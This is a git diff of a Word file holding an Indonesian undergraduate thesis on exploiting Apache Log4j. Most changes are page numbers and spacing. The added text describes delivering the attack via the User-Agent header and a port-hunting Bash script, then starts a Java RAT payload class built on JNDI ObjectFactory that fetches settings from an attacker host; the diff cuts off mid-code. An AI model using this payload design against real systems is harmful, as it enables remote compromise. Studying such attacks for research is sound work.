<commit_message>
update payload docs + java http
</commit_message>
<xml_diff>
--- a/doc/Skripsi_NoIndent_1807422020_Muhammad Nur Irsyad_Git_Word_Update.docx
+++ b/doc/Skripsi_NoIndent_1807422020_Muhammad Nur Irsyad_Git_Word_Update.docx
@@ -6611,7 +6611,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>38</w:t>
+              <w:t>39</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6717,7 +6717,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>39</w:t>
+              <w:t>40</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6824,7 +6824,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>39</w:t>
+              <w:t>40</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6931,7 +6931,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>39</w:t>
+              <w:t>40</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7038,7 +7038,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>39</w:t>
+              <w:t>40</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7145,7 +7145,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>39</w:t>
+              <w:t>40</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7252,7 +7252,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>39</w:t>
+              <w:t>40</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7359,7 +7359,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>39</w:t>
+              <w:t>41</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7466,7 +7466,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>40</w:t>
+              <w:t>41</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7572,7 +7572,7 @@
                 <w:webHidden/>
                 <w:color w:val="000000" w:themeColor="text1"/>
               </w:rPr>
-              <w:t>40</w:t>
+              <w:t>41</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7668,7 +7668,7 @@
               <w:rPr>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>41</w:t>
+              <w:t>42</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7760,7 +7760,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>41</w:t>
+              <w:t>42</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7853,7 +7853,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>41</w:t>
+              <w:t>42</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -7926,7 +7926,7 @@
               <w:rPr>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>42</w:t>
+              <w:t>43</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11813,7 +11813,7 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
-        <w:spacing w:after="170"/>
+        <w:spacing w:after="240"/>
         <w:rPr>
           <w:color w:val="000000"/>
         </w:rPr>
@@ -28107,7 +28107,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body"/>
-        <w:spacing w:after="170"/>
+        <w:spacing w:after="240"/>
         <w:rPr>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
@@ -29493,7 +29493,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body"/>
-        <w:spacing w:after="170"/>
+        <w:spacing w:after="240"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -35257,7 +35257,10 @@
         <w:t xml:space="preserve">sistem </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">target, tipe </w:t>
+        <w:t>penyerang</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, tipe </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -35508,7 +35511,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body"/>
-        <w:spacing w:after="170"/>
+        <w:spacing w:after="240"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -36759,7 +36762,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body"/>
-        <w:spacing w:after="170"/>
+        <w:spacing w:after="240"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -36920,7 +36923,14 @@
           <w:i/>
           <w:iCs/>
         </w:rPr>
-        <w:t>outbound firewall</w:t>
+        <w:t>inbound</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> firewall</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -36935,7 +36945,13 @@
         <w:t xml:space="preserve"> sistem target</w:t>
       </w:r>
       <w:r>
-        <w:t>, sehingga dapat membuka koneksi baru secara leluasa.</w:t>
+        <w:t xml:space="preserve">, sehingga dapat membuka koneksi baru </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">dan diakses </w:t>
+      </w:r>
+      <w:r>
+        <w:t>secara leluasa.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -37047,7 +37063,7 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body"/>
-        <w:spacing w:after="170"/>
+        <w:spacing w:after="240"/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -37184,6 +37200,7 @@
         <w:t xml:space="preserve">nya untuk berjalan </w:t>
       </w:r>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">pada </w:t>
       </w:r>
       <w:r>
@@ -37275,11 +37292,7 @@
         <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Apache </w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Log4j </w:t>
+        <w:t xml:space="preserve">Apache Log4j </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">akan </w:t>
@@ -37299,10 +37312,27 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>UserAgent</w:t>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>User</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>Agent</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> sebagai atribut </w:t>
@@ -37971,6 +38001,7 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">dari </w:t>
       </w:r>
       <w:r>
@@ -38016,7 +38047,6 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>name = Log4j2PropertiesConfig</w:t>
       </w:r>
     </w:p>
@@ -38272,37 +38302,50 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:after="240"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:color w:val="00B050"/>
         </w:rPr>
-        <w:t xml:space="preserve">Berikut </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">pada gambar 4.12 adalah tampilan </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>logging</w:t>
+        <w:t xml:space="preserve">Pada </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">implementasinya, layanan didukung dengan skrip Bash untuk terus mencari nomor porta yang tersedia di dalam sistem target apabila terblokir. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Rentang </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">nomor porta yang digunakan adalah bentuk dinamis, yaitu 49152 – 65535. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Nomor </w:t>
+      </w:r>
+      <w:r>
+        <w:t>porta</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">layanan pada </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>header</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">yang </w:t>
+      </w:r>
+      <w:r>
+        <w:t>diambil secara acak k</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">emudian dilakukan pembaharuan pada atribut </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -38310,7 +38353,106 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>UserAgent</w:t>
+        <w:t>PORT_JAVA_HTTP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">di </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>endpoint</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/properties</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>lalu</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> mengulang proses jalannya layanan</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> HTTP</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Berikut </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">pada gambar 4.12 adalah tampilan </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>logging</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">layanan pada </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>header</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>User</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>Agent</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -38412,7 +38554,13 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>11</w:t>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>2</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -38436,67 +38584,1248 @@
         <w:t>Pengembangan Payload Java</w:t>
       </w:r>
       <w:bookmarkEnd w:id="108"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Body"/>
-      </w:pPr>
-      <w:r>
-        <w:t>[ snippet properties, nama Object, reverseshell ]</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body"/>
         <w:spacing w:after="240"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>Dalam</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">membangun </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> RAT, salah satu komponen yang dibutuhkan </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">program </w:t>
+      </w:r>
+      <w:r>
+        <w:t>adalah</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>interface</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ObjectFactory</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>Interface</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>tersebut</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> merupakan </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">bagian dari </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>framework</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">JNDI yang </w:t>
+      </w:r>
+      <w:r>
+        <w:t>digunakan</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> untuk membuat </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">dan memanggil </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>object</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> dari suatu </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>class</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Adanya </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">implementasi </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>interface</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ObjectFactory</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">memungkinkan suatu </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>object</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> dapat dijalankan di dalam program yang berbeda</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> secara </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>remote</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Hal </w:t>
+      </w:r>
+      <w:r>
+        <w:t>ini dilakukan</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>melalui penggunaan</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> fitur JNDI </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>L</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>ookup</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> serta integrasinya dengan layanan direktori</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> LDAP</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Adapun </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">fungsi yang </w:t>
+      </w:r>
+      <w:r>
+        <w:t>dimodifikasi</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">dari </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>interface</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>tersebut</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">yaitu </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>getObjectInstance</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, untuk dapat </w:t>
+      </w:r>
+      <w:r>
+        <w:t>menjalankan</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">seluruh logika di dalam </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> saat object berhasil di</w:t>
+      </w:r>
+      <w:r>
+        <w:t>panggil</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Berikut </w:t>
+      </w:r>
+      <w:r>
+        <w:t>adalah</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> potongan kode dari implementasi </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>getObjectInstance</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">yang dikostumisasi </w:t>
+      </w:r>
+      <w:r>
+        <w:t>sesuai</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">dengan </w:t>
+      </w:r>
+      <w:r>
+        <w:t>kebutuhan eksploitasi:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ublic class </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> implements </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>ObjectFactory</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>...</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>@Override</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashta</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>ble&lt;?, ?&gt; environment) throws Exception {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="JetBrains Mono Medium" w:hAnsi="JetBrains Mono Medium" w:cs="JetBrains Mono Medium"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">String[] json  = jsonParser("http://192.168.1.9:2080/properties");  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Body"/>
+        <w:spacing w:line="276" w:lineRule="auto"/>
+        <w:rPr>
